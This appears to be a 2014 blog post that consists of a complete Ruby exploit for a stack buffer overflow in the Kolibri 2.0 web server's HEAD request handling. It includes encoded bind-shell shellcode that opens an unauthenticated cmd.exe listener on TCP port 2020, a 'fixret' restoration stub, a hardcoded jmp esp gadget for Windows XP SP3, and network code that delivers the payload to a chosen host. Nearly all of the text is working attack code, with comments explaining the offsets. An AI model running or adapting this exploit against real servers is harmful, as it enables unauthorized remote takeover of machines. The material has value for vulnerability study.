Thursday, May 8, 2014

Kolibri HEAD Request Stack Buffer Overflow - FixRet Technique

#!/usr/bin/env ruby
#
# Exploit Title: Kolibri HEAD Request Stack Buffer Overflow 
# Date: 03 May 2014
# Exploit Author: Muhamad Fadzil Ramli 
# Vendor Homepage: http://www.senkas.com/kolibri/download.php
# Version: Kolibri 2.0 
# Tested on: Microsoft Windows XP (EN) SP3 [Version 5.1.2600]
# MSF Module : https://drive.google.com/file/d/0B8CrAOgplUJcVGpCTGY3VEVyam8/edit?usp=sharing
#
# Description: 
# The affected software suffers a stack-based buffer overflow when an overly long request path is sent in a HEAD request to the server.
# Notes:
# Purposely using larger payload size to overwrite return address location so that 'fixret' technique can be applied.
# Reference:
# 1) http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/
# 2) jduck - fixret msf module
# 3) http://www.exploit-db.com/exploits/16970/ (mr_me)
# 4) 'TheLeader' - original exploit

require 'socket'

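# Target. Defaults match the original PoC (Kolibri listening locally on 8080);
# both can be overridden on the command line:  ruby <script> <host> <port>
# Integer() raises on a non-numeric port instead of silently using 0.
host = ARGV[0] || "127.0.0.1"
port = ARGV[1] ? Integer(ARGV[1]) : 8080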

# ./msfpayload -p windows/shell_bind_tcp LPORT='2020' R | ./msfencode -b '\x00\x0d\x0a\x20\x40\x3f' -t ruby -e x86/alpha_upper
# payload size : 751
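# The 751 bytes below are the msfpayload/msfencode output of the command above:
# a windows/shell_bind_tcp stage (once it runs, an unauthenticated cmd.exe
# listener on TCP 2020 that any host able to reach the target can use), wrapped
# in the x86/alpha_upper decoder. The leading bytes (89 e6 db da d9 76 f4 5f:
# mov esi,esp / fcmovu / fnstenv [esi-0xc] / pop edi) look like the decoder's
# fnstenv-based GetPC sequence; everything after is upper-case alphanumeric.
# NOTE(review): a pasted blob cannot be audited by reading it. Regenerate it
# from the command above (or disassemble this copy) before running the script.
bindtcp =
"\x89\xe6\xdb\xda\xd9\x76\xf4\x5f\x57\x59\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a" +
"\x48\x4c\x49\x35\x50\x33\x30\x43\x30\x53\x50\x4c\x49\x5a" +
"\x45\x36\x51\x58\x52\x52\x44\x4c\x4b\x46\x32\x50\x30\x4c" +
"\x4b\x56\x32\x34\x4c\x4c\x4b\x51\x42\x42\x34\x4c\x4b\x44" +
"\x32\x56\x48\x44\x4f\x4e\x57\x51\x5a\x36\x46\x46\x51\x4b" +
"\x4f\x50\x31\x39\x50\x4e\x4c\x37\x4c\x45\x31\x53\x4c\x35" +
"\x52\x36\x4c\x47\x50\x49\x51\x38\x4f\x34\x4d\x33\x31\x48" +
"\x47\x4b\x52\x5a\x50\x36\x32\x51\x47\x4c\x4b\x30\x52\x34" +
"\x50\x4c\x4b\x50\x42\x57\x4c\x55\x51\x4e\x30\x4c\x4b\x57" +
"\x30\x34\x38\x4c\x45\x39\x50\x43\x44\x31\x5a\x33\x31\x38" +
"\x50\x50\x50\x4c\x4b\x31\x58\x55\x48\x4c\x4b\x36\x38\x47" +
"\x50\x45\x51\x4e\x33\x5a\x43\x47\x4c\x57\x39\x4c\x4b\x47" +
"\x44\x4c\x4b\x43\x31\x38\x56\x50\x31\x4b\x4f\x36\x51\x49" +
"\x50\x4e\x4c\x4f\x31\x48\x4f\x54\x4d\x53\x31\x58\x47\x56" +
"\x58\x4d\x30\x32\x55\x4b\x44\x33\x33\x43\x4d\x5a\x58\x47" +
"\x4b\x43\x4d\x37\x54\x34\x35\x4a\x42\x51\x48\x4c\x4b\x31" +
"\x48\x56\x44\x35\x51\x39\x43\x32\x46\x4c\x4b\x34\x4c\x30" +
"\x4b\x4c\x4b\x50\x58\x35\x4c\x33\x31\x39\x43\x4c\x4b\x44" +
"\x44\x4c\x4b\x45\x51\x4e\x30\x4c\x49\x31\x54\x46\x44\x57" +
"\x54\x31\x4b\x51\x4b\x55\x31\x30\x59\x30\x5a\x36\x31\x4b" +
"\x4f\x4d\x30\x30\x58\x31\x4f\x50\x5a\x4c\x4b\x44\x52\x5a" +
"\x4b\x4b\x36\x31\x4d\x43\x58\x36\x53\x50\x32\x55\x50\x33" +
"\x30\x35\x38\x33\x47\x54\x33\x47\x42\x51\x4f\x51\x44\x55" +
"\x38\x50\x4c\x32\x57\x56\x46\x33\x37\x4b\x4f\x38\x55\x4e" +
"\x58\x5a\x30\x33\x31\x43\x30\x55\x50\x51\x39\x49\x54\x50" +
"\x54\x56\x30\x55\x38\x51\x39\x4b\x30\x52\x4b\x45\x50\x4b" +
"\x4f\x38\x55\x50\x50\x46\x30\x50\x50\x50\x50\x31\x50\x30" +
"\x50\x51\x50\x56\x30\x32\x48\x5a\x4a\x54\x4f\x59\x4f\x4d" +
"\x30\x4b\x4f\x48\x55\x4b\x39\x58\x47\x56\x51\x39\x4b\x50" +
"\x53\x32\x48\x34\x42\x35\x50\x54\x47\x4b\x54\x4d\x59\x4d" +
"\x36\x52\x4a\x44\x50\x51\x46\x31\x47\x55\x38\x4f\x32\x59" +
"\x4b\x36\x57\x52\x47\x4b\x4f\x49\x45\x30\x53\x46\x37\x33" +
"\x58\x4e\x57\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x48\x55\x46" +
"\x33\x56\x33\x46\x37\x45\x38\x53\x44\x5a\x4c\x37\x4b\x4b" +
"\x51\x4b\x4f\x38\x55\x56\x37\x4b\x39\x39\x57\x33\x58\x54" +
"\x35\x32\x4e\x30\x4d\x33\x51\x4b\x4f\x49\x45\x45\x38\x43" +
"\x53\x52\x4d\x52\x44\x45\x50\x4b\x39\x5a\x43\x30\x57\x56" +
"\x37\x31\x47\x36\x51\x4a\x56\x43\x5a\x45\x42\x51\x49\x30" +
"\x56\x4b\x52\x4b\x4d\x35\x36\x49\x57\x57\x34\x51\x34\x57" +
"\x4c\x43\x31\x33\x31\x4c\x4d\x50\x44\x51\x34\x42\x30\x39" +
"\x56\x53\x30\x50\x44\x46\x34\x50\x50\x30\x56\x51\x46\x31" +
"\x46\x50\x46\x31\x46\x30\x4e\x30\x56\x50\x56\x30\x53\x30" +
"\x56\x43\x58\x42\x59\x38\x4c\x57\x4f\x4d\x56\x4b\x4f\x4e" +
"\x35\x4c\x49\x4b\x50\x50\x4e\x56\x36\x30\x46\x4b\x4f\x56" +
"\x50\x45\x38\x53\x38\x4d\x57\x45\x4d\x55\x30\x4b\x4f\x38" +
"\x55\x4f\x4b\x4c\x30\x58\x35\x39\x32\x51\x46\x42\x48\x4f" +
"\x56\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x54" +
"\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4d\x30\x54\x35\x43" +
"\x35\x4f\x4b\x47\x37\x44\x53\x32\x52\x32\x4f\x53\x5a\x45" +
"\x50\x51\x43\x4b\x4f\x58\x55\x41\x41"

# Everything below is raw bytes and every offset is a BYTE offset, but the stub
# and the shellcode contain byte values that are not valid UTF-8. Forcing
# ASCII-8BIT keeps String#[] / #[]= byte-indexed whatever source encoding Ruby
# gave the literals (and avoids Encoding::CompatibilityError when mixing them),
# instead of relying on every high byte happening to form an invalid -- and
# therefore one-byte -- UTF-8 sequence.
bin = ->(s) { s.dup.force_encoding("ASCII-8BIT") }

# Request path, 796 bytes: 1 x 'A' + 38-byte fixret stub + 751-byte payload +
# 6 x 'A'. Layout after the writes below (byte offsets into data):
#   515..518  saved return address  -> 'jmp esp'
#   519..523  'jmp $-512'           -> lands on the nop sled at offset 7
# Both overwrites sit inside the payload (bindtcp offsets 476..484), so the
# stub restores those nine bytes before the decoder runs: the 'fixret'
# technique (reference 1 in the header).
data = bin.call("A" * 796)

# fixret stub at offsets 1..38 (offset 0 stays 'A'). On entry esp == &data[519]:
# 'ret' consumed the overwritten return address and 'jmp esp' landed here.
stub = bin.call([
  "\x90" * 9,                   # 1..9   nop sled
  "\x89\xe2",                   # 10..11 mov edx, esp          ; edx = &data[519]
  "\xc7\x02\x43\x43\x43\x43",   # 12..17 mov [edx], imm32      ; imm (14..17) patched below
  "\x83\xc2\x04",               # 18..20 add edx, 4            ; edx = &data[523]
  "\xc6\x02\xc0",               # 21..23 mov byte [edx], imm8  ; imm (23) patched below
  "\x83\xea\x08",               # 24..26 sub edx, 8            ; edx = &data[515]
  "\xc7\x02\x41\x41\x41\x41",   # 27..32 mov [edx], imm32      ; imm (29..32) patched below
  "\x81\xc4\xfc\xfd\xff\xff",   # 33..38 add esp, -516         ; esp = &data[3], presumably so the
].join)                         #        decoder's own stack use stays clear of the payload
data[1, stub.bytesize] = stub
# bytesize, not length: length counts characters and would silently shrink the
# copy if the blob ever contained a valid multibyte sequence.
data[39, bindtcp.bytesize] = bin.call(bindtcp)   # offsets 39..789

# Save the payload bytes the hijack below destroys into the stub's store
# immediates. Order matters: this must run BEFORE the two overwrites.
data[14, 4] = data[519, 4]   # imm32 for the first store  (jmp bytes 1-4)
data[23, 1] = data[523, 1]   # imm8  for the byte store   (jmp byte 5)
data[29, 4] = data[515, 4]   # imm32 for the second store (return-address slot)

# Plant the hijack. The gadget address is only valid for the tested build
# (OLE32.dll 5.1.2600.6435, XP SP3 EN); pick another 'jmp esp' for other targets.
data[515, 4] = [0x775a693b].pack("V")              # jmp esp (little-endian)
data[519, 5] = bin.call("\xe9\xfb\xfd\xff\xff")    # jmp $-512: rel32 -517 from 524 -> offset 7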

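# Single request, no response handling: the server either crashes or, if the
# overflow worked, is now serving the bind shell on TCP 2020.
# NOTE(review): 'HTTP/1.11' is not a real HTTP version; it is kept as-is because
# this is the exact request the PoC was tested with.
payload = "HEAD /#{data} HTTP/1.11\r\n\r\n"

# Block form closes the socket even if the write raises; write (unlike send)
# keeps going until the whole payload is on the wire. Connection/resolution
# failures are reported instead of dumping a backtrace.
begin
  TCPSocket.open(host, port) { |s| s.write(payload) }
rescue SystemCallError, SocketError => e
  abort "[-] could not deliver to #{host}:#{port}: #{e.message}"
end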